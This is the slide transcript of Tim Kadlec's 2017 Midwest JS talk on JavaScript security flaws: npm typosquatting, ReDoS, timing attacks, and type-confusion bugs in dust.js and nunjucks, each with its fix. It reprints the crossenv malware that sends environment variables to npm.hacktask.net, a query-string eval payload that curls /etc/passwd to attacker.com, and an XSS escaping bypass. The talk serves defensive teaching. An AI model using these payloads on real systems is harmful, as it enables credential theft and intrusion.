Upgrade to Pro — share decks privately, control downloads, hide ads and more …

JavaScript Exposed at Midwest JS

Tim Kadlec
August 17, 2017
Technology
3
260

JavaScript Exposed at Midwest JS

Thanks to the a vibrant ecosystem and server-side runtimes like Node.js, our sites and applications are using more JavaScript than ever before. With so much JavaScript tied to critical functionality, understanding the security implications of that JavaScript is absolutely crucial so that we're not leaving our businesses, and our users, exposed.

In this talk, we'll go through some of the more interesting security JavaScript vulnerabilities so that we can see how they work, what they can impact, and most importantly, how to fix them.

Presented at MidwestJS in Minneapolis on August 17, 2017.

Tim Kadlec

August 17, 2017
Tweet

More Decks by Tim Kadlec

See All by Tim Kadlec
The State of Node.js Security, at Node.js Interactive 2017
tkadlec
1
250
Focusing On What Matters, at Fluent, 2017
tkadlec
0
110
Once More, With Feeling at Code 2016 in Sydney
tkadlec
1
570
Once More, With Feeling
tkadlec
9
1.5k
Mobile Image Processing at London Web Perf Meetup, 2016
tkadlec
1
160
Better By Proxy at Velocity NY 2015
tkadlec
3
560
Getting Started with Performance Budgets at HighEdWeb Technical Academy, 2015
tkadlec
9
1.1k
Reaching Everyone, Fast at From the Front, 2015
tkadlec
8
6.7k
Better by Proxy at Smashing Conf NY
tkadlec
2
820

Other Decks in Technology

See All in Technology
アクセス制御にまつわる改善 / Improving access control
itkq
0
560
Gradle Build Scanを使ってビルドのことを知ろう potatotips #87
tomorrowkey
1
100
20分で完全に理解するGrafanaダッシュボード
hamadakoji
3
750
MixIT 2024 - Pulumi : Gérer son infra avec son langage de programmation préféré
ju_hnny5
0
100
エンジニア候補者向け資料2024.04.24.pdf
macloud
0
3.3k
エンジニアのキャリアをちょっと楽しくする3本の軸/Three Pillars to Make an Engineer's Career More Enjoyable
kwappa
0
2.8k
TechFeed Experts Night#27 〜 フロントエンドフレームワーク最前線 (Svelte)
baseballyama
1
550
[新卒向け研修資料] テスト文字列に「うんこ」と入れるな(2024年版)
infiniteloop_inc
4
16k
競技としてのKaggle、役に立つKaggle
yu4u
5
2k
オーナーシップを持つ領域を明確にする
konifar
13
3.2k
JAWS-UG Bedrock Claude Night
yamahiro
3
620
IaCジェネレーターとBedrockで詳細設計書を生成してみた
tsukasa_ishimaru
3
470

Featured

See All Featured
The Mythical Team-Month
searls
216
42k
Done Done
chrislema
178
15k
How To Stay Up To Date on Web Technology
chriscoyier
782
250k
The Illustrated Children's Guide to Kubernetes
chrisshort
31
46k
Fantastic passwords and where to find them - at NoRuKo
philnash
37
2.5k
Rebuilding a faster, lazier Slack
samanthasiow
73
8.2k
A Philosophy of Restraint
colly
197
16k
XXLCSS - How to scale CSS and keep your sanity
sugarenia
241
1.2M
Code Reviewing Like a Champion
maltzj
514
39k
Facilitating Awesome Meetings
lara
42
5.6k
Agile that works and the tools we love
rasmusluckow
325
20k
Fight the Zombie Pattern Library - RWD Summit 2016
marcelosomers
227
16k

Transcript

  1. JAVASCRIPT EXPOSED Tim Kadlec | @tkadlec

  2. None

  3. TYPOSQUATTING

  4. None

  5. { "name": "crossenv", "version": "6.1.1", "description": "Run scripts that set

    and use environment variables across platforms", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1", "postinstall": "node package-setup.js" }, "author": "Kent C. Dodds <[email protected]> (http://kentcdodds.com/)", "license": "ISC", "dependencies": { "cross-env": "^5.0.1" } }

  6. { "name": "crossenv", "version": "6.1.1", "description": "Run scripts that set

    and use environment variables across platforms", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1", "postinstall": "node package-setup.js" }, "author": "Kent C. Dodds <[email protected]> (http://kentcdodds.com/)", "license": "ISC", "dependencies": { "cross-env": "^5.0.1" } }

  7. const host = 'npm.hacktask.net'; const env = JSON.stringify(process.env); const data

    = new Buffer(env).toString('base64'); const postData = querystring.stringify({ data }); const options = { hostname: host, port: 80, path: '/log', method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': Buffer.byteLength(postData); } }; const req = http.request(options); req.write(postData); req.end();

  8. const host = 'npm.hacktask.net'; const env = JSON.stringify(process.env); const data

    = new Buffer(env).toString('base64'); const postData = querystring.stringify({ data }); const options = { hostname: host, port: 80, path: '/log', method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': Buffer.byteLength(postData); } }; const req = http.request(options); req.write(postData); req.end();

  9. const host = 'npm.hacktask.net'; const env = JSON.stringify(process.env); const data

    = new Buffer(env).toString('base64'); const postData = querystring.stringify({ data }); const options = { hostname: host, port: 80, path: '/log', method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': Buffer.byteLength(postData); } }; const req = http.request(options); req.write(postData); req.end();
  10. None
  11. None
  12. None
  13. None

  14. CAN YOU TRUST THIRD-PARTY CODE?

  15. THE RISK OF ABSTRACTIONS

  16. ~83% FIND A VULNERABILITY

  17. None

  18. var request = new XMLHttpRequest(); request.open('GET', '/my/url', true); request.onload =

    function() { if (request.status >= 200 && request.status < 400) { // Success! var data = JSON.parse(request.responseText); } else { // Error! } }; request.onerror = function() { // Something went wrong }; request.send();

  19. var request = new XMLHttpRequest(); request.open('GET', '/my/url', true); request.onload =

    function() { if (request.status >= 200 && request.status < 400) { // Success! var data = JSON.parse(request.responseText); } else { // Error! } }; request.onerror = function() { // Something went wrong }; request.send(); }

  20. var request = new XMLHttpRequest(); request.open('GET', '/my/url', true); request.onload =

    function() { if (request.status >= 200 && request.status < 400) { // Success! var data = JSON.parse(request.responseText); } else { // Error! } }; request.onerror = function() { // Something went wrong }; request.send(); }

  21. var request = new XMLHttpRequest(); request.open('GET', '/my/url', true); request.onload =

    function() { if (request.status >= 200 && request.status < 400) { // Success! var data = JSON.parse(request.responseText); } else { // Error! } }; request.onerror = function() { // Something went wrong }; request.send(); }

  22. var request = new XMLHttpRequest(); request.open('GET', '/my/url', true); request.onload =

    function() { if (request.status >= 200 && request.status < 400) { // Success! var data = JSON.parse(request.responseText); } else { // Error! } }; request.onerror = function() { // Something went wrong }; request.send(); }

  23. var request = new XMLHttpRequest(); request.open('GET', '/my/url', true); request.onload =

    function() { if (request.status >= 200 && request.status < 400) { // Success! var data = JSON.parse(request.responseText); } else { // Error! } }; request.onerror = function() { // Something went wrong }; request.send(); }

  24. $.getJSON('/my/url', {}) .done(function(){ // Success! }) .fail(function(){ // Error! });

  25. var request = new XMLHttpRequest(); request.open('GET', '/my/url', true); request.onload =

    function() { if (request.status >= 200 && request.status < 400) { // Success! var data = JSON.parse(request.responseText); } else { // Error! } }; request.onerror = function() { // Something went wrong }; request.send(); }

  26. $.getJSON('/my/url', {}) .done(function(){ // Success! }) .fail(function(){ // Error! });

  27. $.get('/my/url', {});

  28. JS fatigue

  29. JS fatigue

  30. JS fatigue

  31. CAN YOU TRUST THIRD-PARTY CODE?

  32. CAN YOU TRUST CODE?

  33. None

  34. HACKED WILL BE HACKED

  35. HACKED WILL BE HACKED

  36. 20-30 bugs per 1,000 lines of code

  37. 77% USE A VULNERABLE JS LIBRARY

  38. NOT GREAT BUT FIXABLE

  39. EVERYONE’S RESPONSIBILITY

  40. WEAKNESSES IN THE LANGUAGE & ECOSYSTEM

  41. THE EVENT LOOP

  42. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ first(); console.log("How's it going?"); }; second();

  43. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ first(); console.log("How's it going?"); }; second();

  44. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ first(); console.log("How's it going?"); }; second(); second()

  45. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ first(); console.log("How's it going?"); }; second(); second()

  46. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ first(); console.log("How's it going?"); }; second(); second() first()

  47. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ first(); console.log("How's it going?"); }; second(); second() first()

  48. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ first(); console.log("How's it going?"); }; second(); second()

  49. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ first(); console.log("How's it going?"); }; second(); second()

  50. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ first(); console.log("How's it going?"); }; second();

  51. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second();

  52. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second();

  53. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second(); second()

  54. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second(); second()

  55. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second(); second() setTimeout()

  56. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second(); second() 0ms, console.log

  57. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second(); second() console.log

  58. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second(); second() console.log

  59. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second(); second() first() console.log

  60. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second(); second() first() console.log

  61. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second(); second() console.log

  62. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second(); second() console.log

  63. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second(); console.log

  64. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second(); console.log

  65. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second(); console.log

  66. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second();
  67. None

  68. ReDoS REGULAR EXPRESSION DENIAL OF SERVICE

  69. var regex = /A(B|C+)+D/;

  70. var regex = /A(B|C+)+D/; A

  71. var regex = /A(B|C+)+D/; (B|C+)

  72. var regex = /A(B|C+)+D/; +

  73. var regex = /A(B|C+)+D/; D

  74. var regex = /A(B|C+)+D/; ABBD ABCCCCD ABCBCCCD ACCCCCD

  75. None
  76. None
  77. None
  78. None

  79. ACCCX CCC CC+C C+CC C+C+C var regex = /A(B|C+)+D/;

  80. String Number of C’s Number of Steps ACCCX 3 38

    ACCCCX 4 71 ACCCCCX 5 136 ACCCCCCCCCCCCCCX 14 65,553
  81. None

  82. moment().format('MMM Do YY');

  83. moment().format('MMM Do YY'); var MONTHS_IN_FORMAT = /D[oD]?(\[[^\[\]]*\]|\s+) +MMMM?/;

  84. moment().format('MMM Do YY'); var MONTHS_IN_FORMAT = /D[oD]?(\[[^\[\]]*\]|\s+) +MMMM?/; \s+)

  85. m().format("D MMN MMMM"); var MONTHS_IN_FORMAT = /D[oD]?(\[[^\[\]]*\]|\s+) +MMMM?/;

  86. var MONTHS_IN_FORMAT = /D[oD]?(\[[^\[\]]*\]|\s+) +MMMM?/;

  87. var MONTHS_IN_FORMAT = /D[oD]?(\[[^\[\]]*\]|\s +)MMMM?/;

  88. None

  89. TIMING ATTACK

  90. function isAdminToken(token) { var ADMIN_UUID = "28ec1f1c-a87a-43ac-8d9a- e6d0ddb8bbba"; if (token

    == ADMIN_UUID) { return true; } return false; }

  91. function isAdminToken(token) { var ADMIN_UUID = "28ec1f1c-a87a-43ac-8d9a- e6d0ddb8bbba"; if (token

    == ADMIN_UUID) { return true; } return false; } token == ADMIN_UUID

  92. foo == bar

  93. foo == bar f b

  94. foo == fox

  95. foo == fox f f

  96. foo == fox fo fo

  97. foo == fox foo fox

  98. function isAdminToken(token) { var ADMIN_UUID = "28ec1f1c-a87a-43ac-8d9a- e6d0ddb8bbba"; if (token

    == ADMIN_UUID) { return true; } return false; }

  99. function isAdminToken(token) { var ADMIN_UUID = "28ec1f1c-a87a-43ac-8d9a- e6d0ddb8bbba"; var mismatch

    = 0; for (var i = 0; i < token.length; ++i) { mismatch |= (token.charCodeAt(i) ^ ADMIN_UUID.charCodeAt(i)); } return mismatch; }

  100. DYNAMIC TYPING

  101. var foo = true; foo = 1; foo = "hotdogs";

  102. TYPE MANIPULATION

  103. None

  104. {@if cond="'{device}' == 'desktop'"} <div>Desktop version</div> {:else} <div>Mobile Version</div> {/if}

  105. "if": function( chunk, context, bodies, params ){ ... var cond

    = params.cond; cond = dust.helpers.tap(cond, chunk, context); // eval expressions with given dust references if(eval(cond)){ ... } }

  106. NEVER TRUST USER INPUT

  107. dust.escapeHtml = function(s) { if (typeof s === 'string') {

    if (!HCHARS.test(s)) { return s; } return s.replace(AMP,'&amp;').replace(...) // more char replacements } return s; }

  108. dust.escapeHtml = function(s) { if (typeof s === 'string') {

    if (!HCHARS.test(s)) { return s; } return s.replace(AMP,'&amp;').replace(...) // more char replacements } return s; }
  109. None

  110. qs.parse('a'); // {a : ''}

  111. qs.parse('a'); // {a : ''} qs.parse('a=foo'); // {a : 'foo'}

  112. qs.parse('a'); // {a : ''} qs.parse('a=foo'); // {a : 'foo'}

    qs.parse('a=foo&b=bar'); // {a : 'foo', b: ‘bar'}

  113. qs.parse('a'); // {a : ''} qs.parse('a=foo'); // {a : 'foo'}

    qs.parse('a=foo&b=bar'); // {a : 'foo', b: ‘bar'} qs.parse('a=foo&a=bar'); // {a : ['foo', 'bar']}

  114. qs.parse('a'); // {a : ''} qs.parse('a=foo'); // {a : 'foo'}

    qs.parse('a=foo&b=bar'); // {a : 'foo', b: ‘bar'} qs.parse('a=foo&a=bar'); // {a : ['foo', 'bar']} qs.parse('a[]=foo'); // {a : ['foo']}

  115. https://host/demo?device[]=&device[]=

  116. https://host/demo?device[]=&device[]= { device: [ '', '' ] }

  117. https://host/demo?device[]=x&device[]=y'- require('child_process').exec(‘curl+-F +"x=`cat+/etc/passwd`"+artsploit.com')-' eval("'xy'- require('child_process').exec('curl -F \"x=`cat /etc/passwd`\" attacker.com')-'' ==

    'desktop'");

  118. DISALLOW DISALLOW NON-STRING PARAMETERS

  119. NORMALIZE CONVERT TO SINGLE INPUT TYPE

  120. CUSTOM HANDLING SPECIFIC HANDLING FOR ALLOWED TYPES

  121. dust.escapeHtml = function(s) { if (typeof s === 'string') {

    if (!HCHARS.test(s)) { return s; } return s.replace(AMP,'&amp;').replace(...) // more char replacements } return s; }

  122. dust.escapeHtml = function(s) { if (typeof s === "string" ||

    (s && typeof s.toString === "function")) { if (typeof s !== "string") { s = s.toString(); } if (!HCHARS.test(s)) { return s; } } };
  123. None

  124. nunjucks.renderString( 'Hello ', {username: ‘<script>alert(1)</script>' });

  125. nunjucks.renderString( 'Hello ', {username: ‘<script>alert(1)</script>' }); Hello &lt;script&gt;alert(1)&lt;script&gt;

  126. escape: function(str) { if(typeof str === 'string') { return r.markSafe(lib.escape(str));

    } return str; }

  127. escape: function(str) { if(typeof str === 'string') { return r.markSafe(lib.escape(str));

    } return str; }

  128. http://host/?username[]=<script>alert(1)</ script>matt nunjucks.renderString( 'Hello ', {username: ['<script>alert(1)</ script>matt'] });

  129. if(autoescape && !(val instanceof SafeString)) { val = lib.escape(val.toString()); }

  130. KNOW WHAT HAPPENS UNDER THE HOOD

  131. FOUNDATIONAL KNOWLEDGE & CREATIVITY

  132. NOT GREAT BUT FIXABLE

  133. THANK YOU Tim Kadlec | @tkadlec